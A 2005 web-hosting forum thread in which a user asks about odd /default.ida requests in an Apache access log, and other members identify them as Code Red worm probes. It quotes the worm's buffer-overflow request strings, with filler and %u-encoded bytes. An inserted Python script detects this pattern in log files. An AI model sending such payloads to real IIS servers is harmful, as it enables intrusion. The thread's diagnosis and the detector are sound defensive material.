Strange entries into access.log


7 replies to this topic

#1 gopo

gopo

    Newbie

  • Member
  • Pip
  • 9 posts

Posted 23 March 2005 - 03:28 PM

Hi guys,

I have no idea if this is the place to ask, so you'll have to forgive me.
I'm hosting my domain with my computer and uniformServer as... server.

Today while reading access.log (just pure curiosity) I observed some really strange entries in the log. If necessary I can post all the entries I'm talking about, but for now I will just post a fragment.
I can see in the error.log that the requests are treated either as "File does not exist" or "URI too long". Nevertheless, is someone trying to attack the server or what?
Here's a fragment:

>> 211.158.113.35 - - [23/Mar/2005:20:02:10 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u
6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u
00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1323

>> 222.91.35.92 - - [23/Mar/2005:20:10:49 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%
u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1323

>>216.251.92.99 - - [23/Mar/2005:20:18:30 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1323


There are a few; some are really, really long, looking like "x90\x02\xb1\x02\xb1\x".

Any ideas? Do you know what default.ida might be? There is no such file on my server.

#2 olajideolaolorun

olajideolaolorun

    Project Manager

  • Admin
  • PipPipPipPipPip
  • 2,347 posts
  • Gender: Male
  • Location: Atlanta, GA
  • SourceForge ID: empirex
  • Wiki ID: olajideolaolorun
  • IRC Nickname: Olajide
  • Main OS: Windows 10

Posted 23 March 2005 - 10:54 PM

Hmm.. It could be a hacker or a bot. It may also not be it if it is occurring from different IPs. If it is happening from different IPs, then it is not a hacker, but could be a search bot or something like that...

#3 olajideolaolorun

Posted 23 March 2005 - 10:58 PM

The IP you used to post this topic refers to Google... hmm...

"...out of ideas..." :D :) :)

#4 AlleyKat

AlleyKat

    Project Helper

  • Super Moderator
  • PipPip
  • 84 posts
  • Location: Odense, Denmark
  • SourceForge ID: dk_alleykat
  • IRC Nickname: (@)AlleyKat :P

Posted 24 March 2005 - 12:12 AM

Except for the file name it rather looks like the Santy-worm that attacks phpBB boards - my guess is that those are hacking attempts, from either an actual hacker or from hacked PCs.

#5 AlleyKat

Posted 24 March 2005 - 12:13 AM

http://www.thesitewi...rediiworm.shtml

It's CodeRed worm attacks.
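
A defender-side check for the request shape shown in this thread, as an added example that is not part of any forum post: it reads Apache common-log lines, flags `/default.ida?` requests that carry a long filler run followed by `%u` escapes, and groups them by source IP with the status the server returned. The function names, the thresholds, and the sample lines (documentation-range IPs, shortened payload) are constructed for illustration.

```python
import re
from collections import defaultdict

# Apache common log format: host ident user [time] "METHOD uri proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)(?: \S+)?" (?P<status>\d{3}) \S+'
)
# Shape seen in the thread: /default.ida? + 50 or more repeats of one filler letter
# + a run of %uXXXX escapes. The thresholds are assumptions chosen for this example.
PROBE_RE = re.compile(
    r'^/default\.ida\?([A-Za-z])\1{49,}(?:%u[0-9a-f]{4}){4,}', re.IGNORECASE
)

def scan(lines):
    """Return {source_ip: [(timestamp, status), ...]} for probe-shaped requests."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m and PROBE_RE.match(m["uri"]):
            hits[m["ip"]].append((m["time"], int(m["status"])))
    return dict(hits)

def answered_ok(hits):
    """IPs whose probe got a 2xx reply; a 4xx means the target file was not there."""
    return sorted(ip for ip, evs in hits.items()
                  if any(200 <= status < 300 for _, status in evs))

# Constructed sample input: documentation-range IPs, shortened filler and escapes.
FILLER = "X" * 224
ESCAPES = "%u9090%u6858%ucbd3%u7801" * 3 + "%u9090%u9090%u00=a"
SAMPLE = [
    f'192.0.2.10 - - [23/Mar/2005:20:02:10 +0100] '
    f'"GET /default.ida?{FILLER}{ESCAPES} HTTP/1.0" 404 1323',
    f'198.51.100.7 - - [23/Mar/2005:20:10:49 +0100] '
    f'"GET /default.ida?{FILLER}{ESCAPES} HTTP/1.0" 404 1323',
    '203.0.113.5 - - [23/Mar/2005:20:11:02 +0100] "GET /index.html HTTP/1.0" 200 5120',
    '192.0.2.10 - - [23/Mar/2005:20:30:00 +0100] "GET /default.ida?id=1 HTTP/1.0" 404 1323',
]

if __name__ == "__main__":
    hits = scan(SAMPLE)
    for ip, events in sorted(hits.items()):
        print(ip, len(events), "probe(s), statuses:", sorted({s for _, s in events}))
    print("probes answered with 2xx:", answered_ok(hits) or "none")
```

Requests the server rejected as "URI too long" may be logged without a parsable request line, so they are skipped here and are better counted from error.log.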

#6 olajideolaolorun

Posted 24 March 2005 - 07:10 AM

Wow.... :D learning something new everyday.. :) seems like it is only unsafe for IIS LOL

#7 kermit

kermit

    Newbie

  • Member
  • Pip
  • 6 posts

Posted 08 May 2005 - 02:43 PM

you should see my server logs... omfg, they're full of crap like that..

i don't care so much about those, that's what debian and apache are for. B)

but the scumbags who work for the riaa and their web crawlers that disobey or ignore robots.txt, and hammer away at a site as fast as they can.. i have a nifty, slow-loading, little infinite bot trap black hole for them, and the worst ones get filtered at the firewall instead. am looking at a dynamic robots.txt though, i saw a site that has an example in perl, it's pretty sweet.. ahh, here it is.. a little outdated, but it gives me a place to start... http://www.leekillough.com/robots.html

#8 olajideolaolorun

Posted 08 May 2005 - 04:51 PM

Not bad B)
